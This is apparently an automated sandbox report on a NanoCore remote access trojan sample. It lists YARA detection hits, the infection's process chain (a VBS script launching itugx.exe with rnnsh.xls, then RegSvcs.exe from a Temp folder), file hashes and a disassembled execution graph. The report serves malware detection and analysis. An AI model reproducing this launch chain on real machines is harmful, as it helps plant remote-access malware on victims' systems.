                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                                                  General

                                                  Target ID:22
                                                  Start time:08:10:50
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
                                                  Imagebase:0x7ff60c2e0000
                                                  File size:163840 bytes
                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Target ID:23
                                                  Start time:08:10:55
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                                                  General

                                                  Target ID:24
                                                  Start time:08:11:00
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0x6f0000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Target ID:25
                                                  Start time:08:11:04
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                                                  General

                                                  Target ID:26
                                                  Start time:08:11:11
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0x6c0000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Target ID:27
                                                  Start time:08:11:13
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
                                                  Imagebase:0x7ff60c2e0000
                                                  File size:163840 bytes
                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language

                                                  General

                                                  Target ID:28
                                                  Start time:08:11:16
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_AntiVM_1, Description: Yara detected AntiVM autoit script, Source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                                                  General

                                                  Target ID:30
                                                  Start time:08:11:21
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0x950000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  General

                                                  Target ID:31
                                                  Start time:08:11:35
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0xe70000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:10.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:10.3%
                                                    Total number of Nodes:1505
                                                    Total number of Limit Nodes:43
                                                    execution_graph 25467 cd62ca 123 API calls __InternalCxxFrameHandler 25441 cdb5c0 100 API calls 25483 cd77c0 118 API calls 25484 cdffc0 RaiseException _com_error::_com_error CallUnexpected 23544 cddec2 23545 cddecf 23544->23545 23552 cce617 23545->23552 23553 cce627 23552->23553 23564 cce648 23553->23564 23556 cc4092 23587 cc4065 23556->23587 23559 cdb568 PeekMessageW 23560 cdb5bc 23559->23560 23561 cdb583 GetMessageW 23559->23561 23562 cdb599 IsDialogMessageW 23561->23562 23563 cdb5a8 TranslateMessage DispatchMessageW 23561->23563 23562->23560 23562->23563 23563->23560 23570 ccd9b0 23564->23570 23567 cce66b LoadStringW 23568 cce645 23567->23568 23569 cce682 LoadStringW 23567->23569 23568->23556 23569->23568 23575 ccd8ec 23570->23575 23572 ccd9e2 23572->23567 23572->23568 23573 ccd9cd 23573->23572 23583 ccd9f0 26 API calls 23573->23583 23576 ccd904 23575->23576 23582 ccd984 _strncpy 23575->23582 23577 ccd928 23576->23577 23584 cd1da7 WideCharToMultiByte 23576->23584 23579 ccd959 23577->23579 23585 cce5b1 50 API calls __vsnprintf 23577->23585 23586 ce6159 26 API calls 3 library calls 23579->23586 23582->23573 23583->23572 23584->23577 23585->23579 23586->23582 23588 cc407c __vswprintf_c_l 23587->23588 23591 ce5fd4 23588->23591 23594 ce4097 23591->23594 23595 ce40bf 23594->23595 23596 ce40d7 23594->23596 23618 ce91a8 20 API calls __dosmaperr 23595->23618 23596->23595 23598 ce40df 23596->23598 23620 ce4636 23598->23620 23599 ce40c4 23619 ce9087 26 API calls __cftof 23599->23619 23605 ce4167 23629 ce49e6 51 API calls 3 library calls 23605->23629 23606 cc4086 SetDlgItemTextW 23606->23559 23608 ce4172 23630 ce46b9 20 API calls _free 23608->23630 23610 ce40cf 23611 cdfbbc 23610->23611 23612 cdfbc5 IsProcessorFeaturePresent 23611->23612 23613 cdfbc4 23611->23613 23615 cdfc07 23612->23615 23613->23606 23631 cdfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23615->23631 23617 cdfcea 23617->23606 23618->23599 23619->23610 23621 ce4653 23620->23621 23627 ce40ef 23620->23627 23621->23627 23632 ce97e5 GetLastError 23621->23632 23623 ce4674 23653 ce993a 38 API calls __cftof 23623->23653 23625 ce468d 23654 ce9967 38 API calls __cftof 23625->23654 23628 ce4601 20 API calls 2 library calls 23627->23628 23628->23605 23629->23608 23630->23610 23631->23617 23633 ce97fb 23632->23633 23634 ce9807 23632->23634 23655 ceae5b 11 API calls 2 library calls 23633->23655 23656 ceb136 20 API calls 2 library calls 23634->23656 23637 ce9801 23637->23634 23639 ce9850 SetLastError 23637->23639 23638 ce9813 23640 ce981b 23638->23640 23663 ceaeb1 11 API calls 2 library calls 23638->23663 23639->23623 23657 ce8dcc 23640->23657 23642 ce9830 23642->23640 23644 ce9837 23642->23644 23664 ce9649 20 API calls __dosmaperr 23644->23664 23645 ce9821 23647 ce985c SetLastError 23645->23647 23665 ce8d24 38 API calls _abort 23647->23665 23648 ce9842 23650 ce8dcc _free 20 API calls 23648->23650 23652 ce9849 23650->23652 23652->23639 23652->23647 23653->23625 23654->23627 23655->23637 23656->23638 23658 ce8dd7 RtlFreeHeap 23657->23658 23659 ce8e00 _free 23657->23659 23658->23659 23660 ce8dec 23658->23660 23659->23645 23666 ce91a8 20 API calls __dosmaperr 23660->23666 23662 ce8df2 GetLastError 23662->23659 23663->23642 23664->23648 23666->23662 25468 ce0ada 51 API calls 2 library calls 23776 cc10d5 23781 cc5abd 23776->23781 23782 cc5ac7 __EH_prolog 23781->23782 23788 ccb505 23782->23788 23784 cc5ad3 23794 cc5cac GetCurrentProcess GetProcessAffinityMask 23784->23794 23789 ccb50f __EH_prolog 23788->23789 23795 ccf1d0 82 API calls 23789->23795 23791 ccb521 23796 ccb61e 23791->23796 23795->23791 23797 ccb630 __cftof 23796->23797 23800 cd10dc 23797->23800 23803 cd109e GetCurrentProcess GetProcessAffinityMask 23800->23803 23804 ccb597 23803->23804 23804->23784 23805 cde2d7 23807 cde1db 23805->23807 23806 cde85d ___delayLoadHelper2@8 14 API calls 23806->23807 23807->23806 23808 cde1d1 14 API calls ___delayLoadHelper2@8 25407 cdf4d3 20 API calls 25485 cea3d0 21 API calls 2 library calls 25486 cf2bd0 VariantClear 25443 ccf1e8 FreeLibrary 23817 cdeae7 23818 cdeaf1 23817->23818 23819 cde85d ___delayLoadHelper2@8 14 API calls 23818->23819 23820 cdeafe 23819->23820 25408 cdf4e7 29 API calls _abort 23821 cdb7e0 23822 cdb7ea __EH_prolog 23821->23822 23989 cc1316 23822->23989 23825 cdbf0f 24061 cdd69e 23825->24061 23826 cdb82a 23828 cdb838 23826->23828 23829 cdb89b 23826->23829 23901 cdb841 23826->23901 23832 cdb83c 23828->23832 23833 cdb878 23828->23833 23831 cdb92e GetDlgItemTextW 23829->23831 23836 cdb8b1 23829->23836 23831->23833 23839 cdb96b 23831->23839 23843 cce617 53 API calls 23832->23843 23832->23901 23840 cdb95f EndDialog 23833->23840 23833->23901 23834 cdbf38 23837 cdbf41 SendDlgItemMessageW 23834->23837 23838 cdbf52 GetDlgItem SendMessageW 23834->23838 23835 cdbf2a SendMessageW 23835->23834 23842 cce617 53 API calls 23836->23842 23837->23838 24079 cda64d GetCurrentDirectoryW 23838->24079 23841 cdb980 GetDlgItem 23839->23841 23987 cdb974 23839->23987 23840->23901 23845 cdb994 SendMessageW SendMessageW 23841->23845 23846 cdb9b7 SetFocus 23841->23846 23847 cdb8ce SetDlgItemTextW 23842->23847 23848 cdb85b 23843->23848 23845->23846 23850 cdb9c7 23846->23850 23866 cdb9e0 23846->23866 23851 cdb8d9 23847->23851 24101 cc124f SHGetMalloc 23848->24101 23849 cdbf82 GetDlgItem 23853 cdbf9f 23849->23853 23854 cdbfa5 SetWindowTextW 23849->23854 23856 cce617 53 API calls 23850->23856 23860 cdb8e6 GetMessageW 23851->23860 23851->23901 23853->23854 24080 cdabab GetClassNameW 23854->24080 23861 cdb9d1 23856->23861 23857 cdbe55 23858 cce617 53 API calls 23857->23858 23862 cdbe65 SetDlgItemTextW 23858->23862 23864 cdb8fd IsDialogMessageW 23860->23864 23860->23901 24102 cdd4d4 23861->24102 23868 cdbe79 23862->23868 23864->23851 23870 cdb90c TranslateMessage DispatchMessageW 23864->23870 23871 cce617 53 API calls 23866->23871 23867 cdc1fc SetDlgItemTextW 23867->23901 23873 cce617 53 API calls 23868->23873 23870->23851 23872 cdba17 23871->23872 23875 cc4092 _swprintf 51 API calls 23872->23875 23909 cdbe9c _wcslen 23873->23909 23874 cdbff0 23878 cdc020 23874->23878 23881 cce617 53 API calls 23874->23881 23880 cdba29 23875->23880 23876 cdc73f 97 API calls 23876->23874 23877 cdb9d9 23999 cca0b1 23877->23999 23883 cdc73f 97 API calls 23878->23883 23914 cdc0d8 23878->23914 23885 cdd4d4 16 API calls 23880->23885 23886 cdc003 SetDlgItemTextW 23881->23886 23890 cdc03b 23883->23890 23884 cdc18b 23891 cdc19d 23884->23891 23892 cdc194 EnableWindow 23884->23892 23885->23877 23893 cce617 53 API calls 23886->23893 23887 cdba68 GetLastError 23888 cdba73 23887->23888 24005 cdac04 SetCurrentDirectoryW 23888->24005 23896 cdc072 23890->23896 23902 cdc04d 23890->23902 23897 cdc1ba 23891->23897 24120 cc12d3 GetDlgItem EnableWindow 23891->24120 23892->23891 23898 cdc017 SetDlgItemTextW 23893->23898 23894 cdba87 23899 cdba9e 23894->23899 23900 cdba90 GetLastError 23894->23900 23895 cce617 53 API calls 23895->23901 23903 cdc0cb 23896->23903 23939 cdc73f 97 API calls 23896->23939 23905 cdc1e1 23897->23905 23910 cdc1d9 SendMessageW 23897->23910 23898->23878 23911 cdbaae GetTickCount 23899->23911 23912 cdbb20 23899->23912 23964 cdbb11 23899->23964 23900->23899 24118 cd9ed5 32 API calls 23902->24118 23906 cdc73f 97 API calls 23903->23906 23905->23901 23913 cce617 53 API calls 